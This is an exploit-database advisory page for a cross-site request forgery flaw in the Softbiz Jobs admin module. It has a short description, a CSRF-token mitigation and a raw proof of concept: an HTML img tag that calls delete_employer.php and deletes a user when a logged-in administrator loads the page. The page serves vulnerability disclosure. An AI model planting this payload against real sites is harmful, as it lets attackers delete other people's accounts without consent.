header-logo
Suggest Exploit
vendor:
Softbiz Jobs
by:
Pratul Agrawal
8,8
CVSS
HIGH
Softbiz Jobs CSRF Vulnerability
352
CWE
Product Name: Softbiz Jobs
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: a:softbizscripts:softbiz_jobs
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Softbiz Jobs CSRF Vulnerability

Softbiz Jobs is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can exploit this vulnerability by crafting a malicious HTML page that contains an image tag with a specially crafted URL. When a logged-in administrator visits the malicious page, the URL will be executed in the context of the administrator's session, allowing the attacker to delete the registered user.

Mitigation:

To mitigate this vulnerability, the application should implement a CSRF token that is checked on all requests that modify the application state.
Source

Exploit-DB raw data:

                     =======================================================================
 
                                         Softbiz Jobs CSRF Vulnerability
                     =======================================================================
 
                                                     by
 
                                               Pratul Agrawal
 
 
# Vulnerability found in- Admin module
 
# email         Pratulag@yahoo.com
 
# company       aksitservices
 
# Credit by     Pratul Agrawal

# Download      http://www.softbizscripts.com/

# Script        softbizscripts

 
 
# Proof of concept

Script to delete the registered user through Cross Site request forgery

             ...................................................................................................................

                        <html>

                          <body>

                              <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] /> 

                          </body>

                        </html>


             ...................................................................................................................



After execution refresh teh page and u can see that user having id=20 get deleted automatically.

 
#If you have any questions, comments, or concerns, feel free to contact me.